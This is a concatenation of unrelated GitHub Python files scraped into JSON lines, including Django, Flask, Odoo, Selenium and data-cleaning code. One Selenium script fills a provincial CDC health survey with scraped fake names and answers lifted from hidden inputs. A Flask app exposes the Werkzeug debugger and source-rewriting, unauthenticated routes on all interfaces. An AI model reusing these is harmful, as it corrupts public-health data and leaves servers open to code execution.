boundary points (minimum one point) - here defined to be all boundaries\n # This is specific to the current dataset\n dirichlet_label, rho_dirichlet, sigma_rho_dirichlet = helper_functions.set_bc(X_pix.shape[0], X_pix.shape[1], experimental_parameters['rho_0'], experimental_parameters['sigma_rho_0'])\n \n # calculate density and uncertainty\n if density_integration_method == 'p':\n # Poisson\n rho, sigma_rho = Density_integration_Poisson_uncertainty(X, Y, mask, rho_x, rho_y,\n dirichlet_label, rho_dirichlet,\n uncertainty_quantification=True,\n sigma_grad_x=sigma_rho_x, sigma_grad_y=sigma_rho_y,\n sigma_dirichlet=sigma_rho_dirichlet)\n elif density_integration_method == 'w':\n # Weighted Least Squares\n rho, sigma_rho = Density_integration_WLS_uncertainty(X, Y, mask,rho_x, rho_y,\n dirichlet_label, rho_dirichlet,\n uncertainty_quantification=True,\n sigma_grad_x=sigma_rho_x, sigma_grad_y=sigma_rho_y,\n sigma_dirichlet=sigma_rho_dirichlet)\n\n # save the results to file\n savemat(filename='sample-result.mat', mdict={'X': X, 'Y': Y, 'rho': rho, 'sigma_rho': sigma_rho,\n 'dirichlet_label': dirichlet_label, 'rho_dirichlet':rho_dirichlet, 'sigma_rho_dirichlet':sigma_rho_dirichlet\n }, long_field_names=True)\n\n # plot results\n fig = helper_functions.plot_figures(X, Y, rho_x, rho_y, rho, sigma_rho)\n \n # save plot to file\n fig.savefig('sample-result.png')\n plt.close()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"lalitkrajendran/bos-density-integration-package","sub_path":"sample_script.py","file_name":"sample_script.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72655404251","text":"from django.core.paginator import Paginator\nfrom django.core.paginator import EmptyPage\nfrom django.core.paginator import 
PageNotAnInteger\nfrom django.db.models import F\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404, redirect\n\n# Create your views here.\nfrom django.views.generic import ListView, DetailView\nfrom django.contrib import messages\n\nfrom news.models import Articles\nfrom .models import Programs\n\n\n\n\nclass ProgramsList(ListView):\n model = Programs\n template_name = 'programs/programms.html'\n paginate_by = 6\n\n def get_context_data(self, **kwargs):\n context = super(ProgramsList, self).get_context_data(**kwargs)\n list_exam = Programs.objects.all()\n paginator = Paginator(list_exam, self.paginate_by)\n\n page = self.request.GET.get('page')\n\n try:\n file_exams = paginator.page(page)\n except PageNotAnInteger:\n file_exams = paginator.page(1)\n except EmptyPage:\n file_exams = paginator.page(paginator.num_pages)\n context['programms_top'] = Articles.objects.all().order_by('-view')[:6]\n context['list_exams'] = file_exams\n return context\n\n# class ProgramsDetail(DetailView):\n# model = Articles\n# template_name = 'programs/programm.html'\n#\n# def get_context_data(self, **kwargs):\n# context = super(ProgramsDetail, self).get_context_data(**kwargs)\n# context['top_art'] = Articles.objects.all().order_by('-view')[:10]\n# context['top_prog'] = Programs.objects.all().order_by('?')[:10]\n\n\n\ndef ProgramsDetail(request, slug):\n tag=None\n article_details = get_object_or_404(Programs,slug=slug)\n top_art = Articles.objects.all().order_by('-view')[:6]\n top_prog = Programs.objects.all().order_by('?')[:6]\n articles_top = Articles.objects.all().order_by('-view')[:6]\n\n return render(\n request,\n 'programs/programm.html',\n {\n 'article_details': article_details,\n 'top_art':top_art,\n 'articles_top':articles_top,\n 'top_prog':top_prog,\n 'tag': tag\n }\n )\n\n\n\n\ndef post_searchProgramm(request):\n queryProgramm = request.GET.get('searchProgramm')\n if queryProgramm:\n results = Programs.objects.filter(title__icontains=queryProgramm).order_by('-date')\n\n total_results = results.count()\n return render(request,\n 'news/posts.html',\n {\n 'results': results,\n 'query': queryProgramm,\n 'total_results': total_results})\n else:\n messages.info(request, 'no results found for {}', format(queryProgramm))","repo_name":"LibGame/itRapter","sub_path":"itRapter/programs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27807192518","text":"from flask import Flask,request\nimport os,sys\nfrom werkzeug.serving import run_simple\n\napp=Flask(__name__)\n\ndef refresh():\n with open(__file__,'w') as fo:\n with open('target.py','r') as f2:\n fo.writelines(f2.readlines())\n with open(__file__) as fo:\n source_code = fo.read()\n byte_code = compile(source_code, __file__, \"exec\")\n # exec(byte_code)\n python = sys.executable\n os.execl(python, python, * sys.argv)\n exit()\n\n@app.route('/')\ndef home():\n return '1'\n\n@app.route('/add')\ndef add():\n refresh()\n return '12'\n\n@app.route('/shutdown')\ndef shutdown():\n shutdown_func=request.environ.get('werkzeug.server.shutdown')\n shutdown_func()\n raise RuntimeError\n\n\n \n\nif __name__=='__main__':\n run_simple('0.0.0.0',8000,app,use_debugger=True,use_reloader=False)\n # 
app.run(host='0.0.0.0')\n","repo_name":"Timothychen00/Flask-Reload","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22927537897","text":"from odoo.tests import Form\nfrom odoo.tests.common import SavepointCase\nfrom odoo.tools import float_compare\n\n\nclass TestDeliveryPriceMethod(SavepointCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n self = cls\n product_shipping_cost = self.env[\"product.product\"].create(\n {\n \"type\": \"service\",\n \"name\": \"Shipping costs\",\n \"standard_price\": 10,\n \"list_price\": 100,\n }\n )\n self.carrier = self.env[\"delivery.carrier\"].create(\n {\n \"name\": \"Test carrier\",\n \"delivery_type\": \"fixed\",\n \"product_id\": product_shipping_cost.id,\n \"fixed_price\": 99.99,\n }\n )\n self.pricelist = self.env[\"product.pricelist\"].create(\n {\n \"name\": \"Test pricelist\",\n \"item_ids\": [\n (\n 0,\n 0,\n {\n \"applied_on\": \"3_global\",\n \"compute_price\": \"formula\",\n \"base\": \"list_price\",\n },\n )\n ],\n }\n )\n self.product = self.env.ref(\"product.product_delivery_01\")\n self.partner = self.env.ref(\"base.res_partner_12\")\n self.sale = self.env[\"sale.order\"].create(\n {\n \"partner_id\": self.partner.id,\n \"pricelist_id\": self.pricelist.id,\n \"carrier_id\": self.carrier.id,\n \"order_line\": [\n (0, 0, {\"product_id\": self.product.id, \"product_uom_qty\": 1})\n ],\n }\n )\n\n def _add_delivery(self):\n sale = self.sale\n delivery_wizard = Form(\n self.env[\"choose.delivery.carrier\"].with_context(\n {\"default_order_id\": sale.id, \"default_carrier_id\": self.carrier}\n )\n )\n choose_delivery_carrier = delivery_wizard.save()\n choose_delivery_carrier.button_confirm()\n\n def test_delivery_price_fixed(self):\n sale = self.sale\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(float_compare(delivery_price, 99.99, precision_digits=2), 0)\n self.assertEqual(len(delivery_lines), 1)\n sale.action_confirm()\n picking = sale.picking_ids[0]\n self.assertEqual(len(picking.move_lines), 1)\n self.assertEqual(picking.carrier_id, self.carrier)\n picking.action_confirm()\n picking.action_assign()\n self.assertFalse(picking.carrier_price)\n picking.send_to_shipper()\n self.assertEqual(picking.carrier_price, 99.99)\n\n def test_delivery_price_method(self):\n self.carrier.write({\"price_method\": \"fixed\", \"fixed_price\": 99.99})\n sale = self.sale\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(float_compare(delivery_price, 99.99, precision_digits=2), 0)\n self.assertEqual(len(delivery_lines), 1)\n self.carrier.write({\"price_method\": \"fixed\", \"fixed_price\": 5})\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(delivery_price, 5)\n self.carrier.write(\n {\n \"price_method\": \"base_on_rule\",\n \"price_rule_ids\": [\n (\n 0,\n 0,\n {\n \"variable\": \"quantity\",\n \"operator\": \"==\",\n \"max_value\": 1,\n \"list_base_price\": 11.11,\n },\n )\n ],\n }\n )\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = 
sum(delivery_lines.mapped(\"price_unit\"))\n        self.assertEqual(delivery_price, 11.11)\n","repo_name":"OCA/delivery-carrier","sub_path":"delivery_price_method/tests/test_delivery_price_method.py","file_name":"test_delivery_price_method.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"32"}
+{"seq_id":"73168720731","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nimport time\nimport os\n# Version: 2.0\n# Browser driver version: 114.0.5735.90\n\n# Fetch the list of names\ndef GettingNames(wd):\n    # Call the WebDriver object's get method to open the given URL in the browser\n    wd.maximize_window()\n    wd.get('https://www.qmsjmfb.com/')\n\n    # Search for the names\n    elements = [element.text for element in wd.find_elements(By.XPATH, \"//div/ul/li\")]\n    return elements\n\n# Fill in the identity information\ndef FulfillInfo(wd, name):\n    # Call the WebDriver object's get method to open the given URL in the browser\n    wd.maximize_window()\n    wd.get('https://www.jscdc.cn/KABP2011/business/index1.jsp?tdsourcetag=s_pcqq_aiomsg')\n\n    # Use Select objects to pick the city (南京市), district (栖霞区) and street (马群街道), then fill in the name\n    Select(wd.find_element(By.ID, \"zone3\")).select_by_visible_text(\"南京市\")\n    Select(wd.find_element(By.ID, \"zone4\")).select_by_visible_text(\"栖霞区\")\n    Select(wd.find_element(By.ID, \"zone5\")).select_by_visible_text(\"马群街道\")\n    wd.find_element(By.ID, 'name').send_keys(name)\n\n    # Use Select objects to pick age group (0~15岁以下), sex (男), education (小学), occupation (学生) and grade (小学3~4年级)\n    Select(wd.find_element(By.ID, \"ageGroup\")).select_by_visible_text(\"0~15岁以下\")\n    Select(wd.find_element(By.ID, \"sex\")).select_by_visible_text(\"男\")\n    Select(wd.find_element(By.ID, \"educationStatus\")).select_by_visible_text(\"小学\")\n    Select(wd.find_element(By.ID, \"metier\")).select_by_visible_text(\"学生\")\n    Select(wd.find_element(By.ID, \"studentLevel\")).select_by_visible_text(\"小学3~4年级\")\n\n    # Click the start button\n    wd.find_element(By.ID, 'log_img').click()\n\n# Answer the questions\ndef AnsweringQuestions(wd):\n    # Get the answers\n    # Get the number of questions\n    num = wd.find_element(By.ID, \"__subjectCount\")\n    num = int(num.text)\n\n    # Collect all the input elements into a list\n    answers = wd.find_elements(By.XPATH, \"//*[@id=\\\"subject\\\"]/input\")\n\n    # Fill in the answers\n    for i in range(num):\n        answer = answers[i].get_attribute('value').split(\",\")[1]\n        wd.find_element(By.CSS_SELECTOR, \"#KWait\" + str(i + 1) + \" input[value=\\\"\" + answer + str(i + 1) + \"\\\"]\").click()\n\n    wd.find_element(By.ID, \"btnAct\" + str(num) + \"\").click()\n    wd.switch_to.alert.accept()\n\n# Main Part\n# Create the WebDriver object, specifying the Chrome browser driver\n# webDriver = webdriver.Chrome(service=Service(r'd:\\\\tools\\\\chromedriver.exe'))\nwebDriver = webdriver.Chrome(service=Service(r'114.0.5735.90\\\\chromedriver.exe'))\nnameList = GettingNames(webDriver)\n\n# Loop through the answering process\nfor i in range(1):\n    name = nameList[i]\n    FulfillInfo(webDriver, name)\n    AnsweringQuestions(webDriver)\n\n    # Wait for the page to finish loading, then take a screenshot\n    time.sleep(1)\n\n    # Check whether the screenshot folder exists\n    if not os.path.exists('Screenshots/'):\n        os.makedirs('Screenshots/')\n    \n    # Save the screenshot file\n    if(webDriver.get_screenshot_as_file('Screenshots/' + str(i+1) + '.png') ):\n        print(\"Screenshots/\" + str(i+1) + \".png is saved successfully.\")\n    else:\n        print(\"Failed to save the Screenshots/\" + str(i+1) + \".png.\")\n        break\n\n# Close the browser\nwebDriver.close()\n","repo_name":"nwomn/AutoTask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30013584137","text":"\ndef stem_plot(lst):\n    lst = [str(i) if i > 9 else '0'+str(i) 
for i in lst]\n dic = {}\n for i in lst:\n stem, leaf = i[:-1], i[-1]\n if stem not in dic: \n dic[stem] = []\n dic[stem] += [leaf]\n return ['{} | {}'.format(k, ' '.join(sorted(v))) for k, v in sorted(dic.items(), key=lambda x: int(x[0]))]\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"sibD9TFg7pmQuzJxW_10.py","file_name":"sibD9TFg7pmQuzJxW_10.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2055308551","text":"import pandas as pd\nimport sys\n\ndef get_state_code_index(df):\n col_list = list(df.columns).index('state_code')\n return col_list\n\ndef state_code_to_int(x):\n x[i] = int(x[i])\n return x\n\n# rst ne\ndef state_code_cleaner(df):\n df['state_code'] = df['state_code'].apply(str)\n df['len'] = df['state_code'].apply(lambda x: len((x)))\n tmp1 = df[(df['len'] == 9) & (~df['state_code'].str.contains('-'))]\n tmp2 = tmp1.drop(['len'],axis=1)\n df_fn = tmp2.apply(state_code_to_int,axis=1)\n # print(tmp2.head())\n return df_fn\n\nif __name__ == '__main__':\n\n fileIn = sys.argv[1]\n fileOut = fileIn[:-4] + '_clr.csv'\n\n df = pd.read_csv(fileIn)\n global i\n i = get_state_code_index(df)\n\n res = state_code_cleaner(df)\n # print(res.columns)\n # res = res.drop(['Unnamed: 0'],axis=1)\n # print(res.info())\n res.to_csv(fileOut,index=False)\n\n # print(state_code_cleaner(jb))\n # print(stae_code_cleaner(jb))\n # print(list(rst.columns).index('len'))\n # rst_fn.to_csv('data/restaurant_clean.csv')","repo_name":"tkionshao/com.iii.4th.state-center-maker","sub_path":"state_code_cleaner/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18576817801","text":"#!/usr/bin/python3\n\nimport json\nimport requests\nimport requests.exceptions\n\n\nclass DefectDojo():\n \"\"\"\n Initialize a DefectDojo API instance.\n \"\"\"\n def __init__(self, api_key, user, host, user_agent=None, verify_ssl=False, api_version='v2', timeout=60, debug=True):\n self.api_key = api_key\n self.user = user\n self.host = host + '/api/' + api_version + '/'\n self.verify_ssl = verify_ssl\n self.api_version = api_version\n self.timeout = timeout\n\n if not user_agent:\n self.user_agent = 'DefectDojo_api'\n else:\n self.user_agent = user_agent\n\n self.debug = debug\n\n def get_users(self, username=None, limit=20):\n params = {}\n if limit:\n params['limit'] = limit\n\n if username:\n params['username'] = username\n\n return self._request('GET', 'users/', params)\n\n def _request(self, method, url, params=None, data=None, files=None):\n \"\"\"Common handler for all HTTP requests.\"\"\"\n if not params:\n params = {}\n\n if data:\n data = json.dumps(data)\n\n headers = {\n 'User-Agent': self.user_agent,\n 'Authorization' : \"Token \" + self.api_key\n }\n\n if not files:\n headers['Content-Type'] = 'application/json'\n\n try:\n if self.debug:\n print(method + ' ' + self.host + url)\n print(params)\n print(headers)\n\n response = requests.request(method=method, url=self.host + url, params=params, data=data, files=files,\n headers=headers,\n timeout=self.timeout,\n verify=self.verify_ssl)\n\n if self.debug:\n print(response.status_code)\n print(response.text)\n\n\n # try:\n # if response.status_code == 201: #Created new object\n # object_id = response.headers[\"Location\"].split('/')\n # key_id = object_id[-2]\n # try:\n # data = int(key_id)\n # except:\n # data = response.json()\n 
#\n # return DefectDojoResponse(message=\"Upload complete\", data=data, success=True)\n # elif response.status_code == 204: #Object updates\n # return DefectDojoResponse(message=\"Object updated.\", success=True)\n # elif response.status_code == 400: #Object not created\n # return DefectDojoResponse(message=\"Error occured in API.\", success=False, data=response.text)\n # elif response.status_code == 404: #Object not created\n # return DefectDojoResponse(message=\"Object id does not exist.\", success=False, data=response.text)\n # elif response.status_code == 401:\n # return DefectDojoResponse(message=\"Unauthorized.\", success=False, data=response.text)\n # elif response.status_code == 414:\n # return DefectDojoResponse(message=\"Request-URI Too Large.\", success=False)\n # elif response.status_code == 500:\n # return DefectDojoResponse(message=\"An error 500 occured in the API.\", success=False, data=response.text)\n # else:\n # data = response.json()\n # return DefectDojoResponse(message=\"Success\", data=data, success=True, response_code=response.status_code)\n # except ValueError:\n # return DefectDojoResponse(message='JSON response could not be decoded.', success=False, data=response.text)\n # except requests.exceptions.SSLError:\n # return DefectDojoResponse(message='An SSL error occurred.', success=False)\n # except requests.exceptions.ConnectionError:\n # return DefectDojoResponse(message='A connection error occurred.', success=False)\n # except requests.exceptions.Timeout:\n # return DefectDojoResponse(message='The request timed out after ' + str(self.timeout) + ' seconds.',\n # success=False)\n except requests.exceptions.RequestException:\n return DefectDojoResponse(message='There was an error while handling the request.', success=False)\n\n\n\n\nclass DefectDojoResponse(object):\n \"\"\"\n Container for all DefectDojo API responses, even errors.\n\n \"\"\"\n\n def __init__(self, message, success, data=None, response_code=-1):\n self.message = message\n self.data = data\n self.success = success\n self.response_code = response_code\n\n def __str__(self):\n if self.data:\n return str(self.data)\n else:\n return self.message\n\n def id(self):\n if self.response_code == 400: #Bad Request\n raise ValueError('Object not created:' + json.dumps(self.data, sort_keys=True, indent=4, separators=(',', ': ')))\n return int(self.data)\n\n def count(self):\n return self.data[\"meta\"][\"total_count\"]\n\n def data_json(self, pretty=False):\n \"\"\"Returns the data as a valid JSON string.\"\"\"\n if pretty:\n return json.dumps(self.data, sort_keys=True, indent=4, separators=(',', ': '))\n else:\n return json.dumps(self.data)\n\n\n\nif __name__ == '__main__':\n pass","repo_name":"doublestraus/secret-finder","sub_path":"notification/defectdojo_old.py","file_name":"defectdojo_old.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26281593900","text":"\"\"\"Sum of the Others\"\"\"\n\n# sumoftheothers\n\nwhile True:\n try:\n nums = list(map(int, input().split()))\n summary = sum(nums)\n for i, val in enumerate(nums):\n if summary - val == val:\n print(val)\n break\n except EOFError:\n break\n","repo_name":"lukaszlukaszew/kattis-solutions","sub_path":"S/sumoftheothers.py","file_name":"sumoftheothers.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31854407803","text":"from decimal import 
Decimal\nfrom src import constants\nfrom time import strptime\nfrom datetime import datetime\n\n\nclass Assignment(object):\n\n def __init__(self, name, due_date, category=None, points_earned=None, points_possible=None,\n grade=None, weighted=False):\n\n self.name = name\n self.due_date = due_date\n\n if category:\n self.category = category.title()\n else:\n self.category = None\n\n # if assignment is weighted, its category must be declared\n if weighted:\n self.grade = grade\n self.points_earned = grade\n self.points_possible = 100\n\n # if assignment is unweighted, and points earned and points possible are given\n elif not weighted and points_earned is not None and points_possible is not None:\n self.points_earned = Decimal(points_earned)\n self.points_possible = Decimal(points_possible)\n self.grade = points_earned / points_possible * 100\n\n # if assignment is unweighted, and only points possible are given\n # (meaning the assignment has not been completed)\n elif not weighted and points_possible is not None:\n self.points_earned = None\n self.points_possible = points_possible\n self.grade = None\n\n else:\n raise InvalidAssignment(\"Assignment must contain a valid set of inputs\")\n\n @staticmethod\n def parse_date(date):\n assignment_day = int(date[1])\n assignment_month = strptime(date[0], '%b').tm_mon\n base_year = constants.QUARTERS[0][2].year\n if assignment_month > 8:\n assignment_year = base_year\n else:\n assignment_year = base_year + 1\n return datetime(assignment_year, assignment_month, assignment_day)\n\n def __str__(self):\n return \"Name: {}, Due Date: {}-{}-{}, Grade: {}\".format(self.name,\n self.due_date.year,\n self.due_date.month,\n self.due_date.day,\n self.grade)\n\n\nclass InvalidAssignment(Exception):\n\n def __init__(self, message):\n super(InvalidAssignment, self).__init__(message)","repo_name":"jpackard18/vcgraph","sub_path":"src/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"43030133852","text":"\"\"\"Code base runs inside a container and executes based on passed in parameters.\"\"\"\nimport sys\n\nimport vt\n\n\nclass VirusTotalService:\n\n def run(self, argv):\n\n client = vt.Client(argv[0])\n\n url_id = vt.url_id(argv[1])\n url = client.get_object('/urls/{}', url_id)\n\n return_dict = {}\n for item in dir(url):\n if not item.startswith('_'):\n return_dict[item] = getattr(url, item)\n return return_dict\n\n\nif __name__ == \"__main__\":\n print(VirusTotalService().run(sys.argv))\n","repo_name":"MSAdministrator/binocular","sub_path":"src/binocular/containers/virustotal.py","file_name":"virustotal.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41859467195","text":"import csv\nimport pyinputplus as pyip\nimport tabulate\nfrom datetime import datetime\n\ndef readCsv(pathCsv):\n \"\"\"Function to read your csv file\n\n Args:\n pathCsv (path) : path of your csv file\n\n Return:\n db : return your data from database as dictionary data type\n\n Warning:\n pay attention to the number of your columns in database. Need adjusment in updating dictionary data\n \"\"\"\n # Read csv file\n file = open(pathCsv, 'r')\n reader = csv.reader(file, delimiter=';')\n\n # columns\n columns = next(reader)\n\n # make dictionary data type. 
db as a variable of dictionary data\n    db = {'columns':columns}\n    for row in reader: # updating dictionary data\n        db.update({\n            str(row[0]) : [int(row[0]), \n                        str(row[1]),\n                        str(row[2]), \n                        str(row[3]),\n                        int(row[4]),\n                        str(row[5])\n                        ]})\n    # close the file\n    file.close()\n    # return the dictionary data\n    return db\n\ndef writeCsv(database, pathCsv):\n    \"\"\"Function to overwrite your csv file\n\n    Args:\n        pathCsv (path) : path of your csv file\n        database : dictionary data\n    \"\"\"\n    # Open the database file in write mode\n    file = open(pathCsv, 'w')\n\n    # Keep the database up to date\n    writer = csv.writer(file, lineterminator='\\n', delimiter=';')\n    columns = list(database.values())[0] # includes both the columns and the data\n    data = list(database.values())[1:]\n    writer.writerow(columns) #db.values()\n    for i in data:\n        writer.writerow(i)\n    # close the file\n    file.close() \n\ndef valueInttoStr(intlistData):\n    \"\"\"Function to convert every integer item\n    contained in a list into a string\n    Args:\n        intlistData (list): list containing integer items\n    \n    Returns:\n        strChoices: list in which every item has been converted to a string\n    \"\"\"\n    strChoices = []\n    for i in intlistData:\n        a = str(i)\n        strChoices.append(a)\n    return strChoices\n\ndef record(pathRecord):\n    \"\"\"Function for showing what user does in the program\n\n    Args:\n        pathRecord : variable that stored your path of record file\n    \"\"\"\n    file = open(pathRecord, \"r\")\n    print(file.read())\n    file.close()\n\n\"\"\"CRUD FUNCTION: \n    1. Create : addMenu(arg1,arg2,...)\n    2. Update : updateMenu(arg1,arg2,...)\n    3. Read : readMenu(arg1,arg2,...)\n    4. Delete : deleteMenu(arg1,arg2,...)\n\"\"\"\n\n# Show data function\ndef readMenu(database):\n    \"\"\"Function to show your data as tabular format\n\n    Args:\n        database (dictionary): the database to display\n    \"\"\"\n    # 2D list of database from csv file\n    data = list(database.values())[1:]\n    # select menu inside readMenu:\n    while True:\n        choices = ['Show all data in database','Show database in detail', 'Back to Main Menu']\n        userInput = pyip.inputMenu(prompt='Select Read Menu:\\n', choices=choices, numbered=True) ## userInput is returned as a string\n        # If user choose 1st option\n        if userInput == 'Show all data in database':\n            # if data in database doesn't exist\n            if data == []:\n                # only display columns without any data\n                # print title\n                print(\"\"\"\n=============================================== Yellow Pages created by @Wajul ===============================================\\n\n                \"\"\")\n                print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n                print(\"\\nData doesn't exist!\")\n            else:\n                # print title\n                print(\"\"\"\n=============================================== Yellow Pages created by @Wajul ===============================================\\n\n                \"\"\")\n                # print database in tabular format\n                print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n                print('\\n')\n        # If user choose 2nd option\n        elif userInput == 'Show database in detail':\n            if data == []:\n                # only display columns without any data\n                print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n                print(\"\\nData doesn't exist!\")\n            else:\n                choicesDetail = ['Detail ID', 'businessField', 'City', 'sorted companyName', 'sorted ID']\n                inputChoicesDetail = pyip.inputMenu(prompt='Filter or sort data according to the: \\n', choices=choicesDetail, numbered=True)\n                # data detailing based on ID\n                if inputChoicesDetail == 'Detail ID':\n                    choices1 = [data[index][0] for index in range(len(data))]\n                    userInput1 = pyip.inputInt(prompt=\"Which ID do you want to return ?\\n\")\n                    #userInput1 = pyip.inputInt(prompt='Which ID do you want to return ?\\n', blockRegexes=[r'a-zA-Z'], lessThan=len(data))\n                    # if ID (index) doesn't exist in database\n                    if userInput1 not in choices1:\n                        print('Data does not exist!\\n')\n                    # else: ID (index) exist in database\n                    else:\n                        print(tabulate.tabulate(list([database[str(userInput1)]]), headers=database['columns'], tablefmt=\"github\"))\n                        print('\\n')\n                \n                # data detailing based on businessField \n                elif inputChoicesDetail == 'businessField':\n                    # Available businessField stored in set data type, hence there's no duplication, then convert into list data type\n                    businessFieldSet = {data[index][2] for index in range(len(data))}\n                    businessFieldList = list(businessFieldSet)\n                    # user chooses a businessField\n                    userInput = pyip.inputMenu(prompt=\"Input the businessField you're looking for\\n\", choices=businessFieldList, numbered=True)\n                    # find the keys of dictionary data\n                    keysTarget = [str(i[0]) for i in data if i[2] == userInput]\n\n                    # data target in 2D list based on keysTarget\n                    dataTarget = [database[i] for i in keysTarget]\n\n                    # show dataTarget in tabular format\n                    print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n                \n                # data detailing based on city\n                elif inputChoicesDetail == 'City':\n                    # Available city stored in set data type, hence there's no duplication, then convert into list data type\n                    citySet = {data[index][3] for index in range(len(data))}\n                    cityList = list(citySet)\n                    # user chooses a city\n                    userInput = pyip.inputMenu(prompt=\"Input the city you're looking for\\n\", choices=cityList, numbered=True)\n                    # find the keys of dictionary\n                    keysTarget = [str(i[0]) for i in data if i[3] == userInput]\n\n                    # data target in 2D list based on keysTarget\n                    dataTarget = [database[i] for i in keysTarget]\n\n                    # show dataTarget in tabular format\n                    print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n                \n                # sorting based on companyName (A-Z)\n                elif inputChoicesDetail == 'sorted companyName':\n                    # sorted company Name\n                    companyNameList = [data[index][1] for index in range(len(data))]\n                    companyNameSort = sorted(companyNameList) # order by companyName A-Z #\n\n                    # find the keys of dictionary\n                    keysTarget = []\n                    for valuesI in companyNameSort: # compare sorted companyName with 2D list[1] which is companyName of database, \n                        for valuesJ in data: # when match, return index[0] which is similar with keys\n                            if valuesI == valuesJ[1]:\n                                keysTarget.append(valuesJ[0])\n\n                    # data target in 2D list based on keysTarget\n                    dataTarget = [database[str(i)] for i in keysTarget]\n\n                    # show dataTarget in tabular format\n                    print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n                \n                # sorting based on ID (0-9)\n                else:\n                    # sorted ID\n                    idList = [data[index][0] for index in range(len(data))]\n                    idSort = sorted(idList) # order by ID 0-9 #\n\n                    # find the keys of dictionary\n                    keysTarget = []\n                    for valuesI in idSort: # compare sorted ID with 2D list[0] which is ID of each data in database, \n                        for valuesJ in data: # when match, return index[0] which is similar with keys\n                            if valuesI == valuesJ[0]:\n                                keysTarget.append(valuesJ[0])\n\n                    # data target in 2D list based on keysTarget\n                    dataTarget = [database[str(i)] for i in keysTarget]\n\n                    # show dataTarget in tabular format\n                    print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n\n        # back to main menu\n        else:\n            break\n\n\n# add data\ndef addMenu(database, pathRecord):\n    \"\"\"Function to add data into your database\n\n    Args:\n        database (dict): the database to process\n        pathRecord: variable that stored your path of record file\n\n    Return:\n        database: latest database\n    \"\"\"\n    # list of data\n    data = list(database.values())[1:]\n\n    while True:\n        choices = ['Add Yellow Pages data', 'Back to Main Menu']\n        userInput = pyip.inputMenu(prompt='Select Add Menu:\\n', choices=choices, numbered=True)\n        if userInput == 'Add Yellow Pages data':\n            # check whether the ID already exists or not\n            choices1 = [data[index][0] for index in range(len(data))]\n            userInputIndex = pyip.inputInt(prompt='Enter the ID (index) you want to add: ') # input ID\n            # if data already exist, show notification 'Data already exist!'\n            if userInputIndex in choices1:\n                print('ID already exists!')\n            # if ID doesn't exist, you can add to database\n            else:\n                companyName = pyip.inputStr(prompt='input company name: ', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n                businessField = pyip.inputStr(prompt='input business field: ', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n                city = pyip.inputStr(prompt='input city: ', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n                # number of digits of phone number must be less than or equal to 11 digits\n                while True:\n                    phoneNumber = pyip.inputInt(prompt='input phone number: ')\n                    if len(str(phoneNumber)) <= 11:\n                        break\n                    else:\n                        print(\"number of digits of the phone number must be less than or equal to 11 digits\")\n                email = pyip.inputEmail(prompt='input email: ')\n                \n                # display added data in tabular format\n                tabularAddedData = [userInputIndex, companyName, businessField, city, phoneNumber, email]\n                print(tabulate.tabulate(list([tabularAddedData]), headers=database['columns'], tablefmt=\"github\"))\n\n                ## saving menu option\n                savingMenuInput = pyip.inputYesNo(prompt='Are you sure you want to save the data ? (Yes/No):')\n                if savingMenuInput == 'yes':\n                    database.update(\n                        {f'{userInputIndex}': [userInputIndex, companyName, businessField, city, phoneNumber, email]})\n                    \n                    # show data after added data in database\n                    data.append(tabularAddedData)\n                    print(tabulate.tabulate(data, 